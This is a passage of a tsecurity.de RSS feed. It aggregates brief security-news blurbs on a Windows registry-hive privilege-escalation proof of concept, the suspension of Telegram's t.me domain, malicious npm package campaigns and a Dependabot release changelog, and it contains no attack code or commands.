<guid isPermaLink="true">https://tsecurity.de/de/3669705/it-security-nachrichten/new-legacyhive-windows-0-day-vulnerability-allows-users-to-load-another-users-registry/</guid>
<pubDate>Wed, 15 Jul 2026 08:08:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A proof-of-concept exploit dubbed LegacyHive has been released, enabling a Windows elevation-of-privilege vulnerability in the Windows User Profile Service that allows a standard user to load another user’s registry hive under their own registry classes root. Registry hives are files that store configuration data for Windows, services, applications, and user profiles. Improperly loading or exposing […]</p>
<p>The post <a href="https://cybersecuritynews.com/legacyhive-windows-0-day-vulnerability/">New LegacyHive Windows 0-day Vulnerability Allows Users  to Load Another User’s Registry</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[O&O RegEditor - Komfortabler Editor für die Windows-Registry]]></title>
<description><![CDATA[Der O&O RegEditor 16.0 (Build 6656) ist eine kostenlose Alternative zum Registrierungs-Editor von Windows. Im Gegensatz zu diesem punktet das Tool unter anderem durch übersichtlichere Suchergebnisse, eine ...			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3668835/downloads/oo-regeditor-komfortabler-editor-fuer-die-windows-registry/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668835/downloads/oo-regeditor-komfortabler-editor-fuer-die-windows-registry/</guid>
<pubDate>Tue, 14 Jul 2026 20:08:16 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/downloadvorschalt,3970.html"><img hspace="5" border="0" align="left" alt="Registry, O&amp;O, O&amp;O RegEditor" width="660" height="371" src="https://i.wfcdn.de/teaser/660/27147.png"></a>
			Der O&amp;O RegEditor 16.0 (Build 6656) ist eine kostenlose Alternative zum Registrierungs-Editor von Windows. Im Gegensatz zu diesem punktet das Tool unter anderem durch übersichtlichere Suchergebnisse, eine ...			(<a href="https://winfuture.de/downloadvorschalt,3970.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-07-14 15h : 5 posts]]></title>
<description><![CDATA[5 posts were published in the last hour 12:32 : Telegram’s t.me Links Go Offline After Registry Places Domain on serverHold 12:32 : Cybercriminals Target Turkish Banks With 8,400 Phishing Domains and 6,600 Scam Ads 12:32 : What is Zero…
Read more →
The post IT Security News Hourly Summary 2026-07...]]></description>
<link>https://tsecurity.de/de/3668009/it-security-nachrichten/it-security-news-hourly-summary-2026-07-14-15h-5-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668009/it-security-nachrichten/it-security-news-hourly-summary-2026-07-14-15h-5-posts/</guid>
<pubDate>Tue, 14 Jul 2026 15:08:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>5 posts were published in the last hour 12:32 : Telegram’s t.me Links Go Offline After Registry Places Domain on serverHold 12:32 : Cybercriminals Target Turkish Banks With 8,400 Phishing Domains and 6,600 Scam Ads 12:32 : What is Zero…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-14-15h-5-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-14-15h-5-posts/">IT Security News Hourly Summary 2026-07-14 15h : 5 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Links Go Offline After Registry Places Domain on serverHold]]></title>
<description><![CDATA[Telegram’s t.me links stopped resolving after the .ME registry applied serverHold. The app still works, while the reason for the domain action remains unknown. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read…
Read more →
The post Telegram’s t.me L...]]></description>
<link>https://tsecurity.de/de/3667946/it-security-nachrichten/telegrams-tme-links-go-offline-after-registry-places-domain-on-serverhold/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667946/it-security-nachrichten/telegrams-tme-links-go-offline-after-registry-places-domain-on-serverhold/</guid>
<pubDate>Tue, 14 Jul 2026 14:41:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s t.me links stopped resolving after the .ME registry applied serverHold. The app still works, while the reason for the domain action remains unknown. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/telegrams-t-me-links-go-offline-after-registry-places-domain-on-serverhold/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/telegrams-t-me-links-go-offline-after-registry-places-domain-on-serverhold/">Telegram’s t.me Links Go Offline After Registry Places Domain on serverHold</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Links Go Offline After Registry Places Domain on serverHold]]></title>
<description><![CDATA[Telegram's t.me links stopped resolving after the .ME registry applied serverHold. The app still works, while the reason for the domain action remains unknown.]]></description>
<link>https://tsecurity.de/de/3667871/it-security-nachrichten/telegrams-tme-links-go-offline-after-registry-places-domain-on-serverhold/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667871/it-security-nachrichten/telegrams-tme-links-go-offline-after-registry-places-domain-on-serverhold/</guid>
<pubDate>Tue, 14 Jul 2026 14:08:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Telegram's t.me links stopped resolving after the .ME registry applied serverHold. The app still works, while the reason for the domain action remains unknown.]]></content:encoded>
</item>
<item>
<title><![CDATA[148 npm Packages Disguised as Student Proxies Turned Browsers Into a DDoS Botnet]]></title>
<description><![CDATA[A campaign of 148 npm packages disguised as student web proxies turned visitors' browsers into a distributed denial-of-service botnet for roughly two weeks in May, according to new research from JFrog.

The packages did not go after the developers who might install them. The operators used the re...]]></description>
<link>https://tsecurity.de/de/3667289/it-security-nachrichten/148-npm-packages-disguised-as-student-proxies-turned-browsers-into-a-ddos-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667289/it-security-nachrichten/148-npm-packages-disguised-as-student-proxies-turned-browsers-into-a-ddos-botnet/</guid>
<pubDate>Tue, 14 Jul 2026 10:24:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A campaign of 148 npm packages disguised as student web proxies turned visitors' browsers into a distributed denial-of-service botnet for roughly two weeks in May, according to new research from JFrog.

The packages did not go after the developers who might install them. The operators used the registry as free hosting for a booby-trapped proxy site and let the students who came to dodge]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me domain suspended at the registry level, breaking links worldwide]]></title>
<description><![CDATA[Telegram's t.me domain was temporarily placed on serverHold status at the registry level on Tuesday, causing all t.me links to stop resolving through the global Domain Name System (DNS). While the messaging platform itself remained operational, users were unable to access public channels, groups,...]]></description>
<link>https://tsecurity.de/de/3667223/it-security-nachrichten/telegrams-tme-domain-suspended-at-the-registry-level-breaking-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667223/it-security-nachrichten/telegrams-tme-domain-suspended-at-the-registry-level-breaking-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 09:52:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram's t.me domain was temporarily placed on serverHold status at the registry level on Tuesday, causing all t.me links to stop resolving through the global Domain Name System (DNS). While the messaging platform itself remained operational, users were unable to access public channels, groups, and profiles through the affected short links until Telegram switched to …</p>
<p>The post <a href="https://cyberinsider.com/telegrams-t-me-domain-suspended-at-the-registry-level-breaking-links-worldwide/">Telegram’s t.me domain suspended at the registry level, breaking links worldwide</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram t.me Domain Suspension Breaks Invite and Message Links Worldwide]]></title>
<description><![CDATA[Telegram’s core t[.]me domain has been placed on server hold at the .me registry, a registry-level status that removes the domain from global DNS resolution and breaks every t[.]me short link worldwide. The disruption affects invite links, channel previews, and shared message URLs across all plat...]]></description>
<link>https://tsecurity.de/de/3666962/it-security-nachrichten/telegram-tme-domain-suspension-breaks-invite-and-message-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666962/it-security-nachrichten/telegram-tme-domain-suspension-breaks-invite-and-message-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 07:52:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s core t[.]me domain has been placed on server hold at the .me registry, a registry-level status that removes the domain from global DNS resolution and breaks every t[.]me short link worldwide. The disruption affects invite links, channel previews, and shared message URLs across all platforms, though Telegram’s primary app infrastructure appears unaffected. WHOIS records […]</p>
<p>The post <a href="https://cyberpress.org/telegram-t-me-domain-suspension/">Telegram t.me Domain Suspension Breaks Invite and Message Links Worldwide</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Domain Suspended, Breaking Invite and Channel Links Worldwide]]></title>
<description><![CDATA[Telegram’s core short-link domain, t.me, has been placed under a serverHold status at the .me registry. This action can remove the domain from the global DNS, making all associated links inaccessible. The incident affects various Telegram features, including invite links,…
Read more →
The post Te...]]></description>
<link>https://tsecurity.de/de/3666846/it-security-nachrichten/telegrams-tme-domain-suspended-breaking-invite-and-channel-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666846/it-security-nachrichten/telegrams-tme-domain-suspended-breaking-invite-and-channel-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 06:37:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s core short-link domain, t.me, has been placed under a serverHold status at the .me registry. This action can remove the domain from the global DNS, making all associated links inaccessible. The incident affects various Telegram features, including invite links,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/telegrams-t-me-domain-suspended-breaking-invite-and-channel-links-worldwide/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/telegrams-t-me-domain-suspended-breaking-invite-and-channel-links-worldwide/">Telegram’s t.me Domain Suspended, Breaking Invite and Channel Links Worldwide</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Domain Suspended, Breaking Invite and Channel Links Worldwide]]></title>
<description><![CDATA[Telegram’s core short-link domain, t.me, has been placed under a serverHold status at the .me registry. This action can remove the domain from the global DNS, making all associated links inaccessible. The incident affects various Telegram features, including invite links, public channel previews,...]]></description>
<link>https://tsecurity.de/de/3666835/it-security-nachrichten/telegrams-tme-domain-suspended-breaking-invite-and-channel-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666835/it-security-nachrichten/telegrams-tme-domain-suspended-breaking-invite-and-channel-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 06:22:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s core short-link domain, t.me, has been placed under a serverHold status at the .me registry. This action can remove the domain from the global DNS, making all associated links inaccessible. The incident affects various Telegram features, including invite links, public channel previews, bot URLs, usernames, and shared message links that rely on the t.me […]</p>
<p>The post <a href="https://gbhackers.com/telegrams-t-me-domain-suspended/">Telegram’s t.me Domain Suspended, Breaking Invite and Channel Links Worldwide</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Domain Suspended, ServerHold Status Breaks Links Worldwide]]></title>
<description><![CDATA[Telegram’s core t[.]me domain has been placed on serverHold at the .me registry, a registry-level status that removes the domain from the global DNS and breaks every t[.]me short link worldwide. WHOIS records confirm the domain now carries eight status…
Read more →
The post Telegram’s t.me Domain...]]></description>
<link>https://tsecurity.de/de/3666824/it-security-nachrichten/telegrams-tme-domain-suspended-serverhold-status-breaks-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666824/it-security-nachrichten/telegrams-tme-domain-suspended-serverhold-status-breaks-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 06:05:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s core t[.]me domain has been placed on serverHold at the .me registry, a registry-level status that removes the domain from the global DNS and breaks every t[.]me short link worldwide. WHOIS records confirm the domain now carries eight status…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/telegrams-t-me-domain-suspended-serverhold-status-breaks-links-worldwide/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/telegrams-t-me-domain-suspended-serverhold-status-breaks-links-worldwide/">Telegram’s t.me Domain Suspended, ServerHold Status Breaks Links Worldwide</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Domain Suspended, ServerHold Status Breaks Links Worldwide]]></title>
<description><![CDATA[Telegram’s core t[.]me domain has been placed on serverHold at the .me registry, a registry-level status that removes the domain from the global DNS and breaks every t[.]me short link worldwide. WHOIS records confirm the domain now carries eight status flags, including serverHold, clientDeletePro...]]></description>
<link>https://tsecurity.de/de/3666723/it-security-nachrichten/telegrams-tme-domain-suspended-serverhold-status-breaks-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666723/it-security-nachrichten/telegrams-tme-domain-suspended-serverhold-status-breaks-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 04:53:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s core t[.]me domain has been placed on serverHold at the .me registry, a registry-level status that removes the domain from the global DNS and breaks every t[.]me short link worldwide. WHOIS records confirm the domain now carries eight status flags, including serverHold, clientDeleteProhibited, and serverDeleteProhibited, with an update timestamp of 2026-07-13T19:24:55Z. The domain remains […]</p>
<p>The post <a href="https://cybersecuritynews.com/telegrams-t-me-domain-suspended/">Telegram’s t.me Domain Suspended, ServerHold Status Breaks Links Worldwide</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Compromised Jscrambler npm Releases Target Developer Environments with Cross-Platform Rust Infostealer]]></title>
<description><![CDATA[  Developers and organizations using the Jscrambler npm package are being urged to audit their systems after multiple malicious releases were uploaded to the npm registry through a compromised publishing credential. The incident transformed a trusted development dependency into a…
Read more →
The...]]></description>
<link>https://tsecurity.de/de/3665920/it-security-nachrichten/compromised-jscrambler-npm-releases-target-developer-environments-with-cross-platform-rust-infostealer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665920/it-security-nachrichten/compromised-jscrambler-npm-releases-target-developer-environments-with-cross-platform-rust-infostealer/</guid>
<pubDate>Mon, 13 Jul 2026 18:39:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Developers and organizations using the Jscrambler npm package are being urged to audit their systems after multiple malicious releases were uploaded to the npm registry through a compromised publishing credential. The incident transformed a trusted development dependency into a…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/compromised-jscrambler-npm-releases-target-developer-environments-with-cross-platform-rust-infostealer/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/compromised-jscrambler-npm-releases-target-developer-environments-with-cross-platform-rust-infostealer/">Compromised Jscrambler npm Releases Target Developer Environments with Cross-Platform Rust Infostealer</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.386.0]]></title>
<description><![CDATA[What's Changed

Capture offending gem details on bundler registry metadata errors by @kbukum1 in #15512
Bundler: apply empty-checksum metadata patch to the v2 helper by @kbukum1 in #15513
[Update graph] Ensure bystander txt files are removed before parsing for Python by @brrygrdn in #15508
Handle...]]></description>
<link>https://tsecurity.de/de/3665919/it-security-tools/v03860/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665919/it-security-tools/v03860/</guid>
<pubDate>Mon, 13 Jul 2026 18:35:24 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Capture offending gem details on bundler registry metadata errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4824191752" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15512" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15512/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15512">#15512</a></li>
<li>Bundler: apply empty-checksum metadata patch to the v2 helper by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4824414250" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15513" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15513/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15513">#15513</a></li>
<li>[Update graph] Ensure bystander txt files are removed before parsing for Python by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4819771035" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15508" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15508/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15508">#15508</a></li>
<li>Handle global.json with no SDK version in dotnet_sdk parser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4821557169" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15510" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15510/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15510">#15510</a></li>
<li>Type the cargo ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4810941973" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15492" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15492/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15492">#15492</a></li>
<li>Type the conda ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4811676578" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15493" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15493/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15493">#15493</a></li>
<li>Type the docker ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4811747259" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15495" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15495/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15495">#15495</a></li>
<li>Use shared git-tag cooldown in terraform by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4786767074" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15472" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15472/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15472">#15472</a></li>
<li>Retry corepack once on signature metadata error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4783580732" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15466" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15466/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15466">#15466</a></li>
<li>Type the deno, elm, devcontainers, bazel, and helm ecosystems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4833014415" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15527" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15527/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15527">#15527</a></li>
<li>Add word-separator and lowercase formatting for branch name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791908912" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15478" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15478/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15478">#15478</a></li>
<li>Fix Docker cooldown not respected for multi-arch images missing Last-Modified by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4796035244" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15486" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15486/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15486">#15486</a></li>
<li>Reduce redundant git-source probes during npm metadata resolution by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4793483366" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15480" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15480/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15480">#15480</a></li>
<li>Type the maven ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4833182059" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15531" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15531/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15531">#15531</a></li>
<li>Add branch name config template format support with validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4835027976" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15535" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15535/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15535">#15535</a></li>
<li>fix(gradle): prefer local gradlew for lockfile updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4847310998" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15546" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15546/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15546">#15546</a></li>
<li>helm: support versioning-strategy (range-preserving updates) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/casey-robertson-paypal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/casey-robertson-paypal">@casey-robertson-paypal</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4585878635" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15218" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15218/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15218">#15218</a></li>
<li>Bump gradle from 9.4.1-jdk21-ubi to 9.6.1-jdk21-ubi in /gradle by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4813506019" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15498" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15498/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15498">#15498</a></li>
<li>[Update graph] Add support for requirements.txt 'layering' instead of compressing to a single file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4829476790" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15521" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15521/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15521">#15521</a></li>
<li>Allow periods in Helm values file names for Docker ecosystem by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/telnet23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/telnet23">@telnet23</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4862784915" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15557" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15557/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15557">#15557</a></li>
<li>Match existing group PRs covering a subset of job directories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IanButterworth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IanButterworth">@IanButterworth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4850701816" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15548" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15548/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15548">#15548</a></li>
